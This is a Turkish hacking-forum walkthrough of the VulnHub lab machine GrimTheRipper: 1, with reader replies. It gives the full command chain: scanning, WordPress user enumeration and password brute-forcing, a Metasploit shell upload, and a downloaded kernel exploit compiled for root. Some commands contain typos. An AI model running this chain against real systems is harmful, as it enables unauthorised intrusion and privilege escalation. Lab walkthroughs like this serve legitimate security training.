GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.

APM7O5.png


https://www.vulnhub.com/entry/grimtheripper-1,350/

5xJRdf.png


Makine İsmi: GrimTheRipper: 1

Yayınlanma Tarihi: 20 Ağustos 2019

Yapımcı: Manish Chandra

Seri: GrimTheRipper

Açıklama: Hedefte Root yetkisine erişmek

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta


RGQJLC.gif


İlk öncelikle hedefin IP adresini almamız lazım bunun için de
Kod:
sudo netdiscover
yazalım.

jFBTPr.jpg


Hedefin IP adresini öğrendik.

1oer9A.jpg


NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için
Kod:
nmap -A IP_ADRESİ
olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük

AeKkLJ.jpg


Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.

s0hxm3.jpg


Siteyi kazımak için dirb aracını kullanacağız. Terminale
Kod:
dirb http://IP_adresi
yazalım.

robots.txt dosyasını ve index dosyalarını buldu bir bakalım.

u7o4mP.jpg


Bizleri index2 kısmına yönlendiriyor.

bgo2us.jpg


İndex2 de ise bir görsel bizleri karşıladı.

STk4XV.jpg


Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı

JETbob.jpg


Bunu
Kod:
echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d
yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar
Kod:
echo 'LzEwMTAxMDE=' | base64 -d
yazdığımda bana /1010101 verisini verdi.

14JKZX.jpg


Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.

mNCnTQ.jpg


Wordpress görüntüsü bu şekildedir

DfBq0w.jpg


Wpscan ile kullanıcı verilerini listelemek için
Kod:
wpscan --url http://IP_adresi/1010101/wordpress/ -e u
yazalım.

4kOUSz.jpg


Kullanıcının admin olduğunu gördük.

RcT8pw.jpg


Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale
Kod:
wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı

zRvdqO.jpg


Şifrenin Password@123 olduğunu öğrendik.

1kVdq7.jpg


Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.
Kod:
msfconsole
yazalım.

PTateP.jpg


Terminale
Kod:
search webapp
yazalım.

WpMNrF.jpg


Burada 105. sıradakini kullanacağız.

7bHWSd.jpg


Kullanmak için
Kod:
use 105
yazalım ve ayarlarını görmek için
Kod:
show options
yazalım.

iR60c2.jpg


Ayarlamamız gereken bazı ayarlar var bunları da
Kod:
set RHOSTS IP_ADRES 
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD Password@123
exploti
yazarak giriş yapalım.

sYYiRZ.jpg


Kabuğa erişmek için ilk öncelikle
Kod:
shell
yazalım ardından da kabuğa erişim için
Kod:
python -c 'import pty;pty.spawn("/bin/bash")'
yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için
Kod:
lsb_release -a
yazarak Linux bilgilerini aldık.

EADvU9.jpg


Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale
Kod:
searchsploit Ubuntu 12.04
yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için
Kod:
searchsploit -m 37292.c
yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için
Kod:
python -m SimpelHTTPServer
yazdım.

tJiNzd.jpg


Ardından exploit ile giriş yaptığımız terminale gelerek
Kod:
cd /tmp
wget IP_adresi:8000/37292.c
yazarak dosyayı makineye indirdik.

0mjI8i.jpg


Ardından dosyayı shell dosyasına çevirmek için
Kod:
gcc 37292.c -o shell
yazdık ve dosyaya tam yetki vermek için
Kod:
chmod 777 shell
yazdık. Ardından shell dosyasını çalıştırmak için
Kod:
./shell
yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız? :) id yazalım ve root yetkisinde olduğumuzu görelim.


f4XPQV.png



Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..

 
Son düzenleme:

By Ghost

Katılımcı Üye
11 Tem 2013
941
2
C:\Linux
Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş :)
 

ratio

Kıdemli Üye
6 Tem 2013
2,456
6
Turk
Elinize sağlık hocam.


Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş :)


Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.
 

Rumexus

Kıdemli Üye
26 Ocak 2016
2,157
323
Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.
 

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Ellerine Sağlık P4RS :), Yine Mükemmel Olmuş.

Elinize sağlık hocam.

Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.

Eline sağlık hocam devamını bekliyorum zafitet çözümlerinin

Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.

Hocam ellerinize sağlık :)

Emeğine sağlık. :)

Beğenmenize sevindim arkadaşlar :))
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.